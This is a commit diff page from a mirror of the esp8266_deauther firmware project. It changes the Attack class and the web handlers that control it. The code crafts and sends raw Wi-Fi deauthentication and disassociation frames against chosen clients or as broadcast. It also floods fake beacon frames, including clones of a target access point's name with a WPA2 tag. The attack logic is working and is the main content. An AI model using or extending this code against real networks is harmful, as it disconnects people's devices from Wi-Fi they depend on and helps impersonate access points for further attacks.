eessppeelllloo/esp8266_deauther
1
0
Fork 0
mirror of https://github.com/SpacehuhnTech/esp8266_deauther.git synced 2025-12-24 07:29:59 +01:00
Code Issues Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
Stefan Kremser
2017-01-13 20:00:07 +01:00
committed by GitHub
parent b2cb33b459
commit 1915513136
8 changed files with 139 additions and 96 deletions
Download Patch File Download Diff File Expand all files Collapse all files

127
esp8266_deauther/Attack.cpp
View File

@@ -9,7 +9,7 @@ Attack::Attack(){
}
void Attack::generate(int num){
randomSeed(os_random());
uint8_t randomMac[6] = {0x00,0x01,0x02,0x00,0x00,0x00};
@@ -19,7 +19,7 @@ void Attack::generate(int num){
getRandomVendorMac(randomMac);
for(int h=0;h<SSIDLen;h++) beaconSSIDs[i][h] = random(32,126); //see: https://www.arduino.cc/en/Reference/ASCIIchart
for(int h=0;h<6;h++) beaconMACs[i][h] = randomMac[h];
beaconNumbers[i] = random(255);
beaconNumbers[i] = random(100,255);
//beaconChannels[i] = random(1,12);
//Serial.println(data_getVendor(randomMac[0],randomMac[1],randomMac[2]));
}
@@ -29,11 +29,11 @@ void Attack::generate(int num){
getRandomVendorMac(randomMac);
for(int h=0;h<SSIDLen;h++) beaconSSIDs[num][h] = random(32,126); //see: https://www.arduino.cc/en/Reference/ASCIIchart
for(int h=0;h<6;h++) beaconMACs[num][h] = randomMac[h];
beaconNumbers[num] = random(255);
beaconNumbers[num] = random(100,255);
//beaconChannels[num] = random(1,12);
//Serial.println(data_getVendor(randomMac[0],randomMac[1],randomMac[2]));
}
}
bool Attack::send(uint8_t buf[], int len){
@@ -48,11 +48,11 @@ bool Attack::send(uint8_t buf[], int len){
}
void Attack::start(int num){
if(!running[num]){
running[num] = true;
stati[num] = "starting";
switch(num){
case 0: //deauth selected
running[1] = false;
@@ -61,22 +61,29 @@ void Attack::start(int num){
for(int i=0;i<6;i++){
deauthPacket[10+i] = deauthPacket[16+i] = apScan.getTarget()._get(i);
}
break;
case 1: //deauth broadcast
running[0] = false;
stati[0] = "ready";
for(int i=0;i<6;i++){
deauthPacket[4+i] = 0xFF;
deauthPacket[10+i] = deauthPacket[16+i] = apScan.getTarget()._get(i);
}
break;
case 2: //beacon
running[3] = false;
stati[3] = "ready";
break;
case 3: //random beacon
running[2] = false;
stati[2] = "ready";
break;
default:
break;
@@ -88,17 +95,25 @@ void Attack::start(int num){
}
String Attack::getResults(){
if(apScan.selected < 0) stati[0] = stati[1] = stati[2] = stati[3] = "no AP";
String json = "{ \"aps\": [";
json += "\""+apScan.getAPName(apScan.selected)+"\"";
json += "], \"clients\": [";
if(clientScan.results>0){
for(int i=0;i<clientScan.results;i++){
if(clientScan.getClientSelected(i)){
json += "\""+clientScan.getClientMac(i).toString()+" "+clientScan.getClientVendor(i)+" - "+clientScan.getClientName(i)+"\",";
}
}
json.remove(json.length()-1);
int selectedClientsNum = 0;
for(int i=0;i<clientScan.results;i++){
if(clientScan.getClientSelected(i)){
json += "\""+clientScan.getClientMac(i).toString()+" "+clientScan.getClientVendor(i)+" - "+clientScan.getClientName(i)+"\",";
selectedClientsNum++;
}
}
if(selectedClientsNum == 0) stati[0] = "no client";
else json.remove(json.length()-1);
json += "], \"attacks\": [";
for(int i=0;i<attackNum;i++){
json += "{";
@@ -109,34 +124,43 @@ String Attack::getResults(){
if(i < attackNum-1) json += ",";
}
json += "] }";
return json;
}
void Attack::run(){
currentMillis = millis();
if(running[0]){
if((currentMillis - previousMillis[0]) >= 1000/deauthsPerSecond){
int clientsSelected = 0;
for(int i=0;i<clientScan.results;i++){
if(clientScan.getClientSelected(i)){
clientsSelected++;
//set Mac adresses
for(int h=0;h<6;h++){
deauthPacket[4+h] = clientScan.getClientMac(i)._get(h);
deauthPacket[10+h] = deauthPacket[16+h] = apScan.getTarget()._get(h);
}
//send deauth frame
deauthPacket[0] = 0xc0;
if(send(deauthPacket, 26)) packetsCounter[0]++;
//send disassociate frame
deauthPacket[0] = 0xa0;
if(send(deauthPacket, 26)) packetsCounter[0]++;
previousMillis[0] = millis();
}
}
}
if(clientsSelected == 0) running[0] = false;
}
if(currentMillis - previousSecond[0] >= 1000){
@@ -145,7 +169,7 @@ void Attack::run(){
previousSecond[0] = millis();
//Serial.println("");
}
}
if(running[1]){
if((currentMillis - previousMillis[1]) >= 1000/deauthsPerSecond){
@@ -160,7 +184,7 @@ void Attack::run(){
}else packetsCounter[1]++;
delay(1);
//send disassociate
deauthPacket[0] = 0xa0;
if(wifi_send_pkt_freedom(deauthPacket, 26, 0) == -1){/*
@@ -169,9 +193,9 @@ void Attack::run(){
PrintHex8(packet, packetSize);
Serial.println("");*/
}else packetsCounter[1]++;
previousMillis[1] = millis();
}
if(currentMillis - previousSecond[1] >= 1000){
@@ -180,20 +204,20 @@ void Attack::run(){
previousSecond[1] = millis();
//Serial.println("");
}
}
if(running[2] || running[3]){
if((currentMillis - previousMillis[3]) >= 1000/beaconPerSecond){
previousMillis[3] = millis();
randomBeaconCounter = 0;
for(int i=0;i<randomBeacons;i++){
//unsigned long startTime = millis();
randomBeaconCounter++;
generatePacket();
if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){/*
Serial.print(packetSize);
Serial.print(" : ");
@@ -209,18 +233,17 @@ void Attack::run(){
else stati[2] = (String)packetsCounter[3]+"pkts/s";
packetsCounter[3] = 0;
previousSecond[3] = millis();
//Serial.println("");
}
}
}
void Attack::generatePacket(){/*
if(running[0]){
}
if(running[1]){
}
else if(running[2] || running[3]){*/
@@ -231,49 +254,58 @@ void Attack::generatePacket(){/*
if(oldRandomBeacon == randomBeacons) oldRandomBeacon = 0;
previousRandomBeaconMillis = currentMillis;
}
packetSize = 0;
for(int i=0;i<sizeof(beaconPacket_header);i++) packet[i] = beaconPacket_header[i];
packetSize += sizeof(beaconPacket_header);
if(running[2]){
if(running[2]){ //target spam
String apName = apScan.getAPName(apScan.selected);
//adds spaces to the AP-SSID if the name length is smaller then the max size of 32
int _restNameLen = SSIDLen - apName.length();
if(randomBeaconCounter < _restNameLen) for(int i=0;i<_restNameLen-randomBeaconCounter;i++) apName += " ";
else apName += " " +(String)beaconNumbers[randomBeaconCounter]+(String)randomBeaconCounter;
if(randomBeaconCounter < _restNameLen) for(int i=0;i<_restNameLen-randomBeaconCounter;i++) apName += " ";//e.g. "SAMPLEAP "
else if(randomBeaconCounter < _restNameLen*2){
apName = "."+apName;
for(int i=0;i<(_restNameLen-1)-randomBeaconCounter/2;i++) apName += " ";//e.g. ".SAMPLEAP "
}
else apName += " "+(String)beaconNumbers[randomBeaconCounter];//e.g. "SAMPLEAP 329"
int _ssidLen = apName.length();
//set SSID size
packet[packetSize] = 0x00;
packet[packetSize+1] = _ssidLen;
packetSize += 2;
//set SSID
for(int i=0;i<_ssidLen;i++) packet[packetSize+i] = apName[i];
packetSize += _ssidLen;
if(apScan.getAPEncryption(apScan.selected) == "WPA2" ||
apScan.getAPEncryption(apScan.selected) == "WPA" ||
if(apScan.getAPEncryption(apScan.selected) == "WPA2" ||
apScan.getAPEncryption(apScan.selected) == "WPA" ||
apScan.getAPEncryption(apScan.selected) == "WPA*"){
//set RSN tag
for(int i=0;i<sizeof(beaconWPA2tag);i++) packet[packetSize+i] = beaconWPA2tag[i];
packetSize += sizeof(beaconWPA2tag);
}
}else {
}else { //random spam
//set SSID size
packet[packetSize] = 0x00;
packet[packetSize+1] = (uint8_t)SSIDLen;
packetSize += 2;
//set SSID
for(int i=0;i<SSIDLen;i++) packet[packetSize+i] = beaconSSIDs[randomBeaconCounter][i];
packetSize += SSIDLen;
}
for(int i=0;i<sizeof(beaconPacket_end);i++) packet[packetSize+i] = beaconPacket_end[i];
packetSize += sizeof(beaconPacket_end);
@@ -285,14 +317,13 @@ void Attack::generatePacket(){/*
void Attack::stopAll(){
for(int i=0;i<attackNum;i++){
running[i] = false;
running[i] = false;
stati[i] = "ready";
}
}
void Attack::stop(int num){
if(num>=0 && num<attackNum){
running[num] = false;
running[num] = false;
stati[num] = "ready";
}
}
}

2
esp8266_deauther/Attack.h
View File

@@ -112,4 +112,4 @@ class Attack
};
};
#endif
#endif

2
esp8266_deauther/ClientScan.cpp
View File

@@ -107,4 +107,4 @@ String ClientScan::getResults(){
void ClientScan::select(int num){
selected[num] = !selected[num];
}
}

2
esp8266_deauther/ClientScan.h
View File

@@ -59,4 +59,4 @@ class ClientScan{
bool selected[maxResults];
};
#endif
#endif

19
esp8266_deauther/NameList.cpp
View File

@@ -1,26 +1,27 @@
#include "NameList.h"
NameList::NameList(){
}
void NameList::begin(){
EEPROM.begin(512);
if((listLength*nameLength+6)+1>512) Serial.println("ERROR: EEPROM OVERFLOW!");
if(EEPROM.read(romAdr)==255) NameList::clear();
}
void NameList::load(){
len = (int)EEPROM.read(romAdr);
if(len < 1 || len > listLength) NameList::clear();
int num = 0;
for(int i=1;i<len*(nameLength+6)+1;i += nameLength+6){
Mac _client;
Mac _client;
for(int i=1;i<len*(nameLength+6)+1;i += nameLength+6){
for(int h=0;h<6;h++) _client.setAt(EEPROM.read(i+h),h);
for(int h=0;h<nameLength;h++) names[num][h] = EEPROM.read(i+h+6);
clients.add(_client);
num++;
}
//Serial.println("list len:"+(String)len);
}
void NameList::clear(){
@@ -56,6 +57,10 @@ void NameList::add(Mac client, String name){
String NameList::get(Mac client){
String returnStr;
int clientNum = clients.getNum(client);
if(clientNum > -1) for(int h=0;h<nameLength;h++) if(names[clientNum][h] != 0x00) returnStr += (char)names[clientNum][h];
if(clientNum > -1){
for(int h=0;h<nameLength;h++){
if(names[clientNum][h] != 0x00) returnStr += (char)names[clientNum][h];
}
}
return returnStr;
}
}

6
esp8266_deauther/NameList.h
View File

@@ -12,7 +12,7 @@
/*
The NameList holds and saves all your custom device names in the EEPROM.
You can modify the length above, but be careful the EEPROM has only 512 bytes.
You have to call nameList.clear() in setup once after
You may have to call nameList.clear() when uploading for the first time.
*/
class NameList
@@ -26,10 +26,10 @@ class NameList
String get(Mac client);
private:
void save();
int len = 0;
MacList clients;
uint8_t names[listLength][nameLength];
};
#endif
#endif

44
esp8266_deauther/data.h
View File

File diff suppressed because one or more lines are too long

33
esp8266_deauther/esp8266_deauther.ino
View File

@@ -1,8 +1,10 @@
#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <ESP8266WebServer.h>
#include <ESP8266mDNS.h>
extern "C" {
extern "C" {
#include "user_interface.h"
}
@@ -20,7 +22,8 @@ ESP8266WebServer server(80);
/*
I had some troubles implementing singleton classes.
see: https://github.com/esp8266/Arduino/issues/500
They fixed this issue with in a newer SDK version, but we can only use the old so I used global variables.
They fixed this issue with in the newer SDK version (the one we can't use),
so I used global variables.
*/
NameList nameList;
@@ -41,25 +44,28 @@ void startWifi(){
Serial.println("Password: "+(String)password);
}
void setup(){
Serial.begin(115200);
delay(2000);
nameList.begin();
//nameList.clear();
nameList.load();
Serial.begin(115200);
delay(2000);
Serial.println("");
Serial.println("starting...");
startWifi();
attack.generate(-1);
/* ========== Web Server ========== */
/* HTML sites */
server.onNotFound(load404);
server.on("/", loadIndex);
server.on("/index.html", loadIndex);
server.on("/clients.html", loadClients);
@@ -79,7 +85,7 @@ void setup(){
server.on("/setName.json", setClientName);
server.on("/attackInfo.json", sendAttackInfo);
server.on("/attackStart.json", startAttack);
server.begin();
}
@@ -92,7 +98,6 @@ void loop(){
server.handleClient();
attack.run();
}
}
void load404(){ server.send ( 200, "text/html", data_get404()); }
@@ -100,7 +105,7 @@ void loadIndex(){ server.send ( 200, "text/html", data_getIndexHTML() ); }
void loadClients(){ server.send ( 200, "text/html", data_getClientsHTML()); }
void loadAttack(){ server.send ( 200, "text/html", data_getAttackHTML() ); }
void loadFunctionsJS(){ server.send( 200, "text/javascript", data_getFunctionsJS() ); }
void loadStyle(){ server.send ( 200, "text/css", data_getStyle()/*, data_getStyleSize()*/ ); }
void loadStyle(){ server.send ( 200, "text/css", data_getStyle() ); }
//==========AP-Scan==========
void startAPScan(){ if(apScan.start()) server.send ( 200, "text/json", "true"); }
@@ -132,8 +137,9 @@ void selectClient(){
server.send ( 200, "text/json", "true");
}
}
void setClientName(){
if(server.hasArg("id")&&server.hasArg("name")) {
if(server.hasArg("id") && server.hasArg("name")) {
nameList.add(clientScan.getClientMac(server.arg("id").toInt()),server.arg("name"));
server.send ( 200, "text/json", "true");
}
@@ -144,7 +150,8 @@ void sendAttackInfo(){ server.send ( 200, "text/json", attack.getResults()); }
void startAttack(){
if(server.hasArg("num") && apScan.selected > -1) {
attack.start(server.arg("num").toInt());
server.send ( 200, "text/json", "true");
}
}
}